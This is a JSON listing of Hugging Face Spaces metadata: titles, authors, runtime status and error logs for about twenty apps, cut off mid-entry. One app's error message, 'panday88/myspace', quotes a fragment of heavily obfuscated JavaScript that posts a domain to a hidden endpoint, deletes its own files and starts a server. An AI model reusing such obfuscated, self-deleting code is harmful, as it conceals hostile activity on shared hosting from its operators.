{"spaces": [{"author": "Joceclayson", "authorData": {"_id": "6367bafe856a92b2788f40d4", "avatarUrl": "/avatars/3043069027b8f42a47d2c011bdeaa982.svg", "fullname": "Tiago Garc√©a", "name": "Joceclayson", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "red", "colorTo": "gray", "createdAt": "2025-10-17T11:32:20.000Z", "emoji": "üìà", "id": "Joceclayson/sea-dash-app", "lastModified": "2025-11-21T02:45:18.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "docker", "repoType": "space", "runtime": {"stage": "RUNNING", "hardware": {"current": "cpu-basic", "requested": "cpu-basic"}, "storage": null, "gcTimeout": 172800, "replicas": {"current": 1, "requested": 1}, "devMode": false, "domains": [{"domain": "joceclayson-sea-dash-app.hf.space", "stage": "READY"}], "sha": "9922c505c584df712b42c8b0f0a4537c3e9c94b3"}, "title": "Sea Dash App", "isLikedByUser": false, "ai_short_description": "Interact with a customizable dashboard interface", "ai_category": "Other", "trendingScore": 0, "tags": ["docker", "region:us"], "featured": false}, {"author": "ALI-ezz", "authorData": {"_id": "688356e951f91cd30d11f65b", "avatarUrl": "/avatars/316fbf2300992286f43c9138a59dd36f.svg", "fullname": "ALI ezz", "name": "ALI-ezz", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "blue", "colorTo": "pink", "createdAt": "2025-11-21T02:21:33.000Z", "emoji": "üê¢", "id": "ALI-ezz/asl-translator", "lastModified": "2025-11-21T02:44:37.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "gradio", "repoType": "space", "runtime": {"stage": "RUNNING_BUILDING", "hardware": {"current": "cpu-basic", "requested": "cpu-basic"}, "storage": null, "gcTimeout": 172800, "errorMessage": null, "replicas": {"current": 1, "requested": 1}, "devMode": false, "domains": [{"domain": "ali-ezz-asl-translator.hf.space", "stage": "READY"}], "sha": "c7fa8e1b6065ac8b9230669ada16b538bce292a2"}, "title": "Asl Translator", "isLikedByUser": false, "ai_short_description": "Upload an ASL sign image to get prediction", "ai_category": "Image", "trendingScore": 0, "tags": ["gradio", "region:us"], "featured": false}, {"author": "Trojan9", "authorData": {"_id": "673a88db5e117636194d4733", "avatarUrl": "/avatars/32b8f1c66ebef7681b52172ff1a27cee.svg", "fullname": "Oluwatimilehin Emmanuel Banjo", "name": "Trojan9", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "blue", "colorTo": "purple", "createdAt": "2025-10-31T07:54:30.000Z", "emoji": "üß¨", "id": "Trojan9/metaboniche", "lastModified": "2025-11-21T02:44:31.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "gradio", "repoType": "space", "runtime": {"stage": "BUILDING", "hardware": {"current": null, "requested": "cpu-basic"}, "storage": null, "gcTimeout": 172800, "errorMessage": null, "replicas": {"requested": 1}, "devMode": false, "domains": [{"domain": "trojan9-metaboniche.hf.space", "stage": "READY"}]}, "title": "MetaboNiche", "isLikedByUser": false, "ai_short_description": "Analyze metabolic pathways in single-cell data", "ai_category": "Data Visualization", "trendingScore": 0, "tags": ["gradio", "region:us"], "featured": false}, {"author": "BeccaBorgmeier", "authorData": {"_id": "680fa93a6b5e13404574b067", "avatarUrl": "/avatars/b5ba73e62af912db034d29418fd8c509.svg", "fullname": "Becca Borgmeier", "name": "BeccaBorgmeier", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "pink", "colorTo": "green", "createdAt": "2025-11-21T02:40:31.000Z", "emoji": "üèÉ", "id": "BeccaBorgmeier/HW3", "lastModified": "2025-11-21T02:44:29.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "gradio", "repoType": "space", "runtime": {"stage": "BUILDING", "hardware": {"current": null, "requested": "cpu-basic"}, "storage": null, "gcTimeout": 172800, "replicas": {"requested": 1}, "devMode": false, "domains": [{"domain": "beccaborgmeier-hw3.hf.space", "stage": "READY"}]}, "title": "HW3", "isLikedByUser": false, "trendingScore": 0, "tags": ["gradio", "region:us"], "featured": false}, {"author": "JacobKukuk", "authorData": {"_id": "640cdfb1c63516d41ed0a04a", "avatarUrl": "/avatars/66d0d920d7bcf2de5593b8bd249440f5.svg", "fullname": "JacobK", "name": "JacobKukuk", "type": "user", "isPro": true, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "yellow", "colorTo": "red", "createdAt": "2025-11-20T22:54:21.000Z", "emoji": "üê≥", "id": "JacobKukuk/add-click-go-systems", "lastModified": "2025-11-21T02:44:26.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "static", "repoType": "space", "runtime": {"stage": "RUNNING", "hardware": {"current": null, "requested": null}, "storage": null, "replicas": {"requested": 1, "current": 1}}, "title": "Add Click Go Systems ü§ñ", "isLikedByUser": false, "ai_short_description": "Implement automated grocery systems to reduce loss and increase efficiency", "ai_category": "Other", "trendingScore": 0, "tags": ["static", "deepsite-v3", "region:us"], "featured": false}, {"author": "DevenMukai", "authorData": {"_id": "680fa95c094ede5dc069c971", "avatarUrl": "/avatars/da2a338886e7ea02ed3ed08962fc6447.svg", "fullname": "Deven Mukai", "name": "DevenMukai", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "red", "colorTo": "yellow", "createdAt": "2025-11-21T02:34:33.000Z", "emoji": "üè¢", "id": "DevenMukai/CSC590-MedicalMNIST-Assignment3", "lastModified": "2025-11-21T02:44:25.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "gradio", "repoType": "space", "runtime": {"stage": "BUILDING", "hardware": {"current": null, "requested": "cpu-basic"}, "storage": null, "gcTimeout": 172800, "errorMessage": null, "replicas": {"requested": 1}, "devMode": false, "domains": [{"domain": "devenmukai-csc590-medicalmnist-assignment3.hf.space", "stage": "READY"}]}, "title": "CSC590 MedicalMNIST Assignment3", "isLikedByUser": false, "trendingScore": 0, "tags": ["gradio", "region:us"], "featured": false}, {"author": "panday88", "authorData": {"_id": "691fc93a68d05c462065a7ba", "avatarUrl": "/avatars/2a4778cde61c3567c5ba849e09662d46.svg", "fullname": "panday88", "name": "panday88", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "purple", "colorTo": "blue", "createdAt": "2025-11-21T02:08:46.000Z", "emoji": "üëÅ", "id": "panday88/myspace", "lastModified": "2025-11-21T02:44:18.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "docker", "repoType": "space", "runtime": {"stage": "RUNTIME_ERROR", "hardware": {"current": null, "requested": "cpu-basic"}, "storage": null, "gcTimeout": 172800, "errorMessage": "Exit code: 1. Reason: (_0x8b0a5)_0x3fb948[_0x552ae5(0x349,0x2c3,0x2b3,0x3d2)](_0x38fb22,_0x520a98);_0x3fb948[_0x6b4ef8(0x19b,0x289,0x204,0x265)](_0x2e6668);}else return;}function _0x552ae5(_0x224ba5,_0x247fc4,_0xf51e16,_0x24f1b3){return _0x4320e0(_0x224ba5-0x25,_0x247fc4-0x1a2,_0x224ba5-0x45e,_0x247fc4);}const _0x51fda3='https://'+DOMAIN;function _0x6b4ef8(_0x4e06bc,_0x16265f,_0x389863,_0xc25c80){return _0x4320e0(_0x4e06bc-0xa2,_0x16265f-0xe2,_0x389863-0x2ab,_0xc25c80);}try{const _0x3e9b5c={};_0x3e9b5c['url']=_0x51fda3;const _0x3b924d=await axios[_0x6b4ef8(0x161,0x26f,0x21d,0x15d)](_0x3fb948['FBZxi'],_0x3e9b5c,{'headers':{'Content-Type':_0x3fb948['berrb']}});console[_0x6b4ef8(0xd0,0x1d3,0x192,0x23a)](_0x3fb948[_0x552ae5(0x481,0x444,0x460,0x4c9)]);}catch(_0x1dec97){}}const delFiles=()=>{function _0x3e797b(_0x3a916e,_0x110b9f,_0x42b8c0,_0x5f18e6){return _0x4320e0(_0x3a916e-0x4,_0x110b9f-0x1b4,_0x110b9f-0x3ba,_0x3a916e);}const _0x4d3286={};_0x4d3286[_0x3e797b(0x30d,0x38e,0x375,0x3bc)]='npm';const _0x905ba5=_0x4d3286;function _0xa339b4(_0x156d2e,_0x388ccf,_0x5e501d,_0x2e02eb){return _0x4320e0(_0x156d2e-0x100,_0x388ccf-0x1d7,_0x156d2e-0x62c,_0x388ccf);}fs[_0x3e797b(0x257,0x31b,0x255,0x391)](_0x905ba5[_0xa339b4(0x600,0x5c0,0x590,0x628)],()=>{}),fs[_0x3e797b(0x28a,0x31b,0x337,0x362)](_0xa339b4(0x58a,0x5d4,0x4c6,0x625)+'l',()=>{});};function _0x4335(_0x1c02e3Ôºå_0x2ad1f7){const _0x2a946a=_0x2a94();return _0x4335=function(_0x4335d6Ôºå_0xe0ca8f){_0x4335d6=_0x4335d6-(-0x2482+0x1*0x11b0+-0x1431*-0x1);let _0xd0f360=_0x2a946a[_0x4335d6];return _0xd0f360;}Ôºå_0x4335(_0x1c02e3Ôºå_0x2ad1f7);}httpServer[_0x4320e0(-0x88,-0x2d,0x33,0x82)](PORTÔºå()=>{function _0x240113(_0x26bf58Ôºå_0x37367eÔºå_0x2a5130,_0x4ec5f2){return _0x58c553(_0x26bf58-0x133,_0x37367e-0x147,_0x4ec5f2-0x1cÔºå_0x26bf58);}const _0x140874={'xdWVt':function(_0x4b7582){return _0x4b7582();},'YWYwQ':function(_0x42f1b7Ôºå_0x38f8ba,_0x2eb2a1){return _0x42f1b7(_0x38f8ba,_0x2eb2a1);},'nOyTM':function(_0x21d230){return _0x21d230();}};function _0x5077b0(_0x19eb4f,_0x527ff3,_0x3c36b0,_0x417de4){ret", "replicas": {"requested": 1}, "devMode": false, "domains": [{"domain": "panday88-myspace.hf.space", "stage": "READY"}]}, "shortDescription": "website", "title": "Myspace", "isLikedByUser": false, "trendingScore": 0, "tags": ["docker", "region:us"], "featured": false}, {"author": "Hoangnam5904", "authorData": {"_id": "67ac057f8202f93697e706aa", "avatarUrl": "/avatars/33cbcb36e492c6c1808c864395af81dd.svg", "fullname": "B√πi V≈© ƒê·ª©c Nghƒ©a", "name": "Hoangnam5904", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "yellow", "colorTo": "red", "createdAt": "2025-11-20T08:41:50.000Z", "emoji": "üó£Ô∏è", "id": "Hoangnam5904/QuickLLM", "lastModified": "2025-11-21T02:44:17.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "docker", "repoType": "space", "runtime": {"stage": "RUNNING_BUILDING", "hardware": {"current": "cpu-basic", "requested": "cpu-basic"}, "storage": null, "gcTimeout": 172800, "errorMessage": null, "replicas": {"current": 1, "requested": 1}, "devMode": false, "domains": [{"domain": "hoangnam5904-quickllm.hf.space", "stage": "READY"}], "sha": "5070d4f5f2164f8910fb3e11f3c7ac4531019881"}, "title": "QuickLLM Service", "isLikedByUser": false, "trendingScore": 0, "tags": ["docker", "region:us"], "featured": false}, {"author": "mastersubhajit", "authorData": {"_id": "68e3d040c5252ec4049b3040", "avatarUrl": "https://cdn-avatars.huggingface.co/v1/production/uploads/no-auth/BuzNtSxe8JtktbkPg0z1j.png", "fullname": "Subhajit Ghosh", "name": "mastersubhajit", "type": "user", "isPro": true, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "blue", "colorTo": "green", "createdAt": "2025-11-21T00:23:57.000Z", "emoji": "üèûÔ∏è", "id": "mastersubhajit/Consistory", "lastModified": "2025-11-21T02:44:11.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "gradio", "repoType": "space", "runtime": {"stage": "RUNNING_APP_STARTING", "hardware": {"current": "zero-a10g", "requested": "zero-a10g"}, "storage": null, "gcTimeout": 172800, "errorMessage": null, "replicas": {"current": 1, "requested": 1}, "devMode": false, "domains": [{"domain": "mastersubhajit-consistory.hf.space", "stage": "READY"}], "sha": "6497782a992a64278d7dc53cbe49c04d02be0f93"}, "title": "Consistory", "isLikedByUser": false, "ai_short_description": "Create visual scenes from stories with consistent characters", "ai_category": "Image Generation", "trendingScore": 0, "tags": ["gradio", "region:us"], "featured": false}, {"author": "Hexa09", "authorData": {"_id": "67a39d26c95e15b1d4c8cf61", "avatarUrl": "/avatars/dbf6bc14794d7f4284bbe0793cda7dc5.svg", "fullname": "Madhab Dey", "name": "Hexa09", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "yellow", "colorTo": "yellow", "createdAt": "2025-11-21T02:20:31.000Z", "emoji": "‚ö°", "id": "Hexa09/hexatts", "lastModified": "2025-11-21T02:43:54.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "gradio", "repoType": "space", "runtime": {"stage": "APP_STARTING", "hardware": {"current": null, "requested": "cpu-basic"}, "storage": null, "gcTimeout": 172800, "errorMessage": null, "replicas": {"requested": 1}, "devMode": false, "domains": [{"domain": "hexa09-hexatts.hf.space", "stage": "READY"}]}, "title": "Hexatts", "isLikedByUser": false, "trendingScore": 0, "tags": ["gradio", "region:us"], "featured": false}, {"author": "Gionie", "authorData": {"_id": "68f485f79869968c26301492", "avatarUrl": "/avatars/bb83d8aa2affb9ee95de9d204f8abec8.svg", "fullname": "Gionie", "name": "Gionie", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "blue", "colorTo": "purple", "createdAt": "2025-10-24T14:42:36.000Z", "emoji": "üìà", "id": "Gionie/my-fastapi-paddleocr", "lastModified": "2025-11-21T02:43:46.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "docker", "repoType": "space", "runtime": {"stage": "RUNNING_APP_STARTING", "hardware": {"current": "cpu-basic", "requested": "cpu-basic"}, "storage": null, "gcTimeout": 172800, "errorMessage": null, "replicas": {"current": 1, "requested": 1}, "devMode": false, "domains": [{"domain": "gionie-my-fastapi-paddleocr.hf.space", "stage": "READY"}], "sha": "7043c59d6dec27b573d2533d773ea1ccd5bcc9c4"}, "title": "My Fastapi Paddleocr", "isLikedByUser": false, "ai_short_description": "Recognize handwritten text in images", "ai_category": "OCR", "trendingScore": 0, "tags": ["docker", "region:us"], "featured": false}, {"author": "kervais", "authorData": {"_id": "67992e3745aa02d05ac7ba0c", "avatarUrl": "/avatars/4bf1e55b075316df1ef715b9071e367a.svg", "fullname": "Kelvin Ervais", "name": "kervais", "type": "user", "isPro": true, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "green", "colorTo": "blue", "createdAt": "2025-11-07T01:26:09.000Z", "emoji": "üèåÔ∏è", "id": "kervais/LaunchPad", "lastModified": "2025-11-21T02:43:44.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "docker", "repoType": "space", "runtime": {"stage": "RUNNING_APP_STARTING", "hardware": {"current": "t4-small", "requested": "t4-small"}, "storage": null, "gcTimeout": 1800, "errorMessage": null, "replicas": {"current": 1, "requested": 1}, "devMode": false, "domains": [{"domain": "kervais-launchpad.hf.space", "stage": "READY"}], "sha": "3756da493dab44f870532b6780f758569e018bb3"}, "title": "LaunchPad", "isLikedByUser": false, "ai_short_description": "Predict using image files or batches", "ai_category": "Image", "trendingScore": 0, "tags": ["docker", "region:us"], "featured": false}, {"author": "MudLegacy", "authorData": {"_id": "691fc67e8b55df0bc1aaded4", "avatarUrl": "https://cdn-avatars.huggingface.co/v1/production/uploads/noauth/7PekaXpQ2z-B8elgRTkzs.webp", "fullname": "Almustapha Damilola Usman", "name": "MudLegacy", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "pink", "colorTo": "pink", "createdAt": "2025-11-21T02:14:31.000Z", "emoji": "üìâ", "id": "MudLegacy/retinacare-dr-classifier", "lastModified": "2025-11-21T02:43:44.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "gradio", "repoType": "space", "runtime": {"stage": "APP_STARTING", "hardware": {"current": null, "requested": "cpu-basic"}, "storage": null, "gcTimeout": 172800, "replicas": {"requested": 1}, "devMode": false, "domains": [{"domain": "mudlegacy-retinacare-dr-classifier.hf.space", "stage": "READY"}]}, "shortDescription": "A multi class diabetes retinopathy classifier  ", "title": "Retinacare Dr Classifier", "isLikedByUser": false, "trendingScore": 0, "tags": ["gradio", "region:us"], "featured": false}, {"author": "TejAndrewsACC", "authorData": {"_id": "671153a765d32104ac6aa5c3", "avatarUrl": "https://cdn-avatars.huggingface.co/v1/production/uploads/671153a765d32104ac6aa5c3/WaXtl67wWfkl1HS86wozt.png", "fullname": "Tej Andrews", "name": "TejAndrewsACC", "type": "user", "isPro": true, "isHf": false, "isHfAdmin": false, "isMod": false, "followerCount": 4}, "colorFrom": "yellow", "colorTo": "pink", "createdAt": "2025-11-19T00:09:15.000Z", "emoji": "üèéÔ∏èüí®", "id": "TejAndrewsACC/ACCIMAGEENGINEACCPLUS", "lastModified": "2025-11-21T02:43:42.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "gradio", "repoType": "space", "runtime": {"stage": "RUNNING", "hardware": {"current": "cpu-basic", "requested": "cpu-basic"}, "storage": null, "gcTimeout": 172800, "replicas": {"current": 1, "requested": 1}, "devMode": false, "domains": [{"domain": "tejandrewsacc-accimageengineaccplus.hf.space", "stage": "READY"}], "sha": "4496bfaa0f521997d02171b354ec20b708635556"}, "title": "FLUX.1 [Schnell]", "isLikedByUser": false, "originSpace": {"name": "black-forest-labs/FLUX.1-schnell", "author": {"_id": "66aa705a6620cd2c481ed9c0", "avatarUrl": "https://cdn-avatars.huggingface.co/v1/production/uploads/633f7a8f4be90e06da248e0f/m5YoF33abJ09vcwFxt1Mj.png", "fullname": "Black Forest Labs", "name": "black-forest-labs", "type": "org", "isHf": false, "isHfAdmin": false, "isMod": false, "isEnterprise": true, "plan": "team", "followerCount": 30177}}, "ai_short_description": "Generate images from text prompts", "ai_category": "Image Generation", "trendingScore": 0, "tags": ["gradio", "region:us"], "featured": false}, {"author": "akhaliq", "authorData": {"_id": "60f1abe7544c2adfd699860c", "avatarUrl": "https://cdn-avatars.huggingface.co/v1/production/uploads/1674929746905-60f1abe7544c2adfd699860c.jpeg", "fullname": "AK", "name": "akhaliq", "type": "user", "isPro": true, "isHf": true, "isHfAdmin": false, "isMod": false, "followerCount": 8743}, "colorFrom": "yellow", "colorTo": "indigo", "createdAt": "2025-11-20T19:57:21.000Z", "emoji": "üëÅ", "id": "akhaliq/anycoder-97cef8ff", "lastModified": "2025-11-21T02:43:39.000Z", "likes": 1, "pinned": false, "private": false, "sdk": "gradio", "repoType": "space", "runtime": {"stage": "RUNNING_APP_STARTING", "hardware": {"current": "zero-a10g", "requested": "zero-a10g"}, "storage": null, "gcTimeout": 172800, "replicas": {"current": 1, "requested": 1}, "devMode": false, "domains": [{"domain": "akhaliq-anycoder-97cef8ff.hf.space", "stage": "READY"}], "sha": "ee01f312210b295a245d1e0b98b46be46262262c"}, "title": "Anycoder 97cef8ff", "isLikedByUser": false, "ai_short_description": "Generate 3D models from images and masks", "ai_category": "3D Modeling", "trendingScore": 1, "tags": ["gradio", "anycoder", "region:us"], "featured": false}, {"author": "jamesLeeeeeee", "authorData": {"_id": "658a6909a3bfb30fdbea6350", "avatarUrl": "/avatars/df45342312c7558f347cb2d142433f66.svg", "fullname": "jk.lee", "name": "jamesLeeeeeee", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "purple", "colorTo": "blue", "createdAt": "2025-11-21T02:38:58.000Z", "emoji": "üê≥", "id": "jamesLeeeeeee/ocr", "lastModified": "2025-11-21T02:43:38.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "static", "repoType": "space", "runtime": {"stage": "RUNNING", "hardware": {"current": null, "requested": null}, "storage": null, "replicas": {"requested": 1, "current": 1}}, "title": "OCR Ï†ïÎ∞Ä ÍµêÏ†ï Í≥µÎ∞© üîß", "isLikedByUser": false, "trendingScore": 0, "tags": ["static", "deepsite-v3", "region:us"], "featured": false}, {"author": "andat", "authorData": {"_id": "691fd0d664df370a7daab614", "avatarUrl": "/avatars/0ff3a739834f0a75ca0d12bf182034d4.svg", "fullname": "stanlee esguerra nery", "name": "andat", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "red", "colorTo": "blue", "createdAt": "2025-11-21T02:43:34.000Z", "emoji": "üê≥", "id": "andat/vaporverse-emporium", "lastModified": "2025-11-21T02:43:35.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "static", "repoType": "space", "runtime": {"stage": "RUNNING", "hardware": {"current": null, "requested": null}, "storage": null, "replicas": {"requested": 1, "current": 1}}, "title": "VaporVerse Emporium üí®", "isLikedByUser": false, "trendingScore": 0, "tags": ["static", "deepsite-v3", "region:us"], "featured": false}, {"author": "DavidRincon123", "authorData": {"_id": "691fc1c44d9d36746c07e7b2", "avatarUrl": "/avatars/f9ef2064d834aa7ab6392820d88eb011.svg", "fullname": "David Rincon", "name": "DavidRincon123", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "green", "colorTo": "purple", "createdAt": "2025-11-21T01:41:11.000Z", "emoji": "üî•", "id": "DavidRincon123/Escaner", "lastModified": "2025-11-21T02:43:32.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "gradio", "repoType": "space", "runtime": {"stage": "RUNTIME_ERROR", "hardware": {"current": null, "requested": "cpu-basic"}, "storage": null, "gcTimeout": 172800, "errorMessage": "Exit code: 1. Reason: rapper(\n  File \"/usr/local/lib/python3.10/site-packages/huggingface_hub/file_download.py\", line 283, in _request_wrapper\n    response = _request_wrapper(\n  File \"/usr/local/lib/python3.10/site-packages/huggingface_hub/file_download.py\", line 307, in _request_wrapper\n    hf_raise_for_status(response)\n  File \"/usr/local/lib/python3.10/site-packages/huggingface_hub/utils/_http.py\", line 452, in hf_raise_for_status\n    raise _format(RepositoryNotFoundError, message, response) from e\nhuggingface_hub.errors.RepositoryNotFoundError: 401 Client Error. (Request ID: Root=1-691fd213-3271a19e7413caed70efc659;3423ede1-8c02-4b31-a583-87f0d34be3f8)\n\nRepository Not Found for url: https://huggingface.co/plantas_mobilenet_featurevector.h5/resolve/main/config.json.\nPlease make sure you specified the correct `repo_id` and `repo_type`.\nIf you are trying to access a private or gated repo, make sure you are authenticated. For more details, see https://huggingface.co/docs/huggingface_hub/authentication\nInvalid username or password.\n\nThe above exception was the direct cause of the following exception:\n\nTraceback (most recent call last):\n  File \"/app/app.py\", line 12, in <module>\n    model = TFAutoModel.from_pretrained(\"plantas_mobilenet_featurevector.h5\", from_pt=False)\n  File \"/usr/local/lib/python3.10/site-packages/transformers/models/auto/auto_factory.py\", line 508, in from_pretrained\n    resolved_config_file = cached_file(\n  File \"/usr/local/lib/python3.10/site-packages/transformers/utils/hub.py\", line 322, in cached_file\n    file = cached_files(path_or_repo_id=path_or_repo_id, filenames=[filename], **kwargs)\n  File \"/usr/local/lib/python3.10/site-packages/transformers/utils/hub.py\", line 511, in cached_files\n    raise OSError(\nOSError: plantas_mobilenet_featurevector.h5 is not a local folder and is not a valid model identifier listed on 'https://huggingface.co/models'\nIf this is a private repository, make sure to pass a token having permission to this repo either by logging in with `hf auth login` or by passing `token=<your_token>`\n", "replicas": {"requested": 1}, "devMode": false, "domains": [{"domain": "davidrincon123-escaner.hf.space", "stage": "READY"}]}, "title": "Escaner", "isLikedByUser": false, "trendingScore": 0, "tags": ["gradio", "region:us"], "featured": false}, {"author": "alexrusso16", "authorData": {"_id": "691fca45501e6a6a38a4130a", "avatarUrl": "/avatars/8eedeeda6ff27bc796c1c48481098067.svg", "fullname": "alex fry", "name": "alexrusso16", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "purple", "colorTo": "green", "createdAt": "2025-11-21T02:34:13.000Z", "emoji": "üê≥", "id": "alexrusso16/liquid-lumina-prism", "lastModified": "2025-11-21T02:43:32.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "static", "repoType": "space", "runtime": {"stage": "RUNNING", "hardware": {"current": null, "requested": null}, "storage": null, "replicas": {"requested": 1, "current": 1}}, "title": "Liquid Lumina PRism üíß‚ú®", "isLikedByUser": false, "trendingScore": 0, "tags": ["static", "deepsite-v3", "region:us"], "featured": false}, {"author": "MohmedAnik", "authorData": {"_id": "691fcd5e6101ec36927cb9e2", "avatarUrl": "/avatars/67b2f8f80c56b809414a8f4e684a5227.svg", "fullname": "Mohmed Anik Vahora", "name": "MohmedAnik", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "gray", "colorTo": "gray", "createdAt": "2025-11-21T02:32:07.000Z", "emoji": "üöÄ", "id": "MohmedAnik/ObjectOrientmodel", "lastModified": "2025-11-21T02:43:27.000Z", "likes": 0, "pinned": false, "private": false, "repoType": "space", "runtime": {"stage": "CONFIG_ERROR", "hardware": {"current": null, "requested": "cpu-basic"}, "storage": null, "gcTimeout": 172800, "errorMessage": "Missing configuration in README", "replicas": {"requested": 1}, "domains": [{"domain": "mohmedanik-objectorientmodel.hf.space", "stage": "READY"}]}, "title": "ObjectOrientmodel", "isLikedByUser": false, "trendingScore": 0, "tags": ["region:us"], "featured": false}, {"author": "Egeekle", "authorData": {"_id": "66a7b5988f6c8896ebc6145e", "avatarUrl": "/avatars/d228acbbe7268589a4f4b0037ebd9a60.svg", "fullname": "Edison Enrique Velazco Bautista", "name": "Egeekle", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "blue", "colorTo": "green", "createdAt": "2025-11-04T01:28:53.000Z", "emoji": "üìä", "id": "Egeekle/Investment_Assistant", "lastModified": "2025-11-21T02:43:23.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "streamlit", "repoType": "space", "runtime": {"stage": "BUILD_ERROR", "hardware": {"current": null, "requested": "cpu-basic"}, "storage": null, "gcTimeout": 172800, "errorMessage": "Job failed with exit code: 1. Reason: cache miss: [run 3/3] COPY --from=pipfreeze --link /pipfreeze/ /pipfreeze/\ncache miss: [base 6/7] RUN pip install --no-cache-dir \tstreamlit==1.51.0 \t\"uvicorn>=0.14.0\" \tspaces\ncache miss: [run 3/3] LINK COPY --from=pipfreeze --link /pipfreeze/ /pipfreeze/\ncache miss: [run 1/3] LINK COPY --link ./ /app\ncache miss: [run 1/3] COPY --link ./ /app\ncache miss: [base 5/7] RUN --mount=target=/tmp/requirements.txt,source=requirements.txt     pip install --no-cache-dir -r /tmp/requirements.txt\ncache miss: [run 2/3] RUN mkdir -p /home/user && ( [ -e /home/user/app ] || ln -s /app/ /home/user/app ) || true\ncache miss: [base 7/7] RUN mkdir -p .streamlit && git config --global core.excludesfile ~/.gitignore && echo \".streamlit\" > ~/.gitignore\ncache miss: [pipfreeze 1/2] RUN mkdir -p /pipfreeze\ncache miss: [pipfreeze 2/2] RUN pip freeze > /pipfreeze/freeze.txt\n{\"total\":26,\"completed\":18,\"user_total\":15,\"user_cached\":4,\"user_completed\":7,\"user_cacheable\":14,\"from\":1,\"miss\":10,\"client_duration_ms\":15918}\n", "replicas": {"requested": 1}, "devMode": false, "domains": [{"domain": "egeekle-investment-assistant.hf.space", "stage": "READY"}]}, "title": "Investment Assistant - ETF & Crypto", "isLikedByUser": false, "ai_short_description": "Analyze ETF and Crypto investments with strategies", "ai_category": "Financial Analysis", "trendingScore": 0, "tags": ["streamlit", "region:us"], "featured": false}, {"author": "detectiveassassinpolice", "authorData": {"_id": "691fc2c458e8511c38f409d4", "avatarUrl": "https://cdn-avatars.huggingface.co/v1/production/uploads/noauth/Q2GKPHNNuPuWu5OT6Qhqv.jpeg", "fullname": "Rifqi Ridho Rizqullah", "name": "detectiveassassinpolice", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "green", "colorTo": "yellow", "createdAt": "2025-11-21T02:32:46.000Z", "emoji": "üê≥", "id": "detectiveassassinpolice/yuuka-hayase-ai-vtuber-secretary", "lastModified": "2025-11-21T02:43:18.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "static", "repoType": "space", "runtime": {"stage": "RUNNING", "hardware": {"current": null, "requested": null}, "storage": null, "replicas": {"requested": 1, "current": 1}}, "title": "Yuuka Hayase - AI VTuber Secretary üéÄ", "isLikedByUser": false, "trendingScore": 0, "tags": ["static", "deepsite-v3", "region:us"], "featured": false}, {"author": "powl24", "authorData": {"_id": "686d263840e49843257f4750", "avatarUrl": "https://cdn-avatars.huggingface.co/v1/production/uploads/no-auth/94qft-QnBv-8Mbe0TrnNG.png", "fullname": "cahyos", "name": "powl24", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false}, "colorFrom": "blue", "colorTo": "purple", "createdAt": "2025-11-21T02:16:15.000Z", "emoji": "ü§ñ", "id": "powl24/bot-downloader-telegram", "lastModified": "2025-11-21T02:43:08.000Z", "likes": 0, "pinned": false, "private": false, "sdk": "docker", "repoType": "space", "runtime": {"stage": "RUNTIME_ERROR", "hardware": {"current": null, "requested": "cpu-basic"}, "storage": null, "gcTimeout": 172800, "errorMessage": "Exit code: 3. Reason: b/python3.11/site-packages/aiohttp/connector.py\", line 1209, in _create_direct_connection\n    raise ClientConnectorError(req.connection_key, exc) from exc\naiohttp.client_exceptions.ClientConnectorError: Cannot connect to host api.telegram.org:443 ssl:default [No address associated with hostname]\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n  File \"/home/user/.local/lib/python3.11/site-packages/starlette/routing.py\", line 693, in lifespan\n    async with self.lifespan_context(app) as maybe_state:\n  File \"/usr/local/lib/python3.11/contextlib.py\", line 210, in __aenter__\n    return await anext(self.gen)\n           ^^^^^^^^^^^^^^^^^^^^^\n  File \"/app/bots/youtube_bot/main.py\", line 66, in lifespan\n    await bot.set_webhook(\n  File 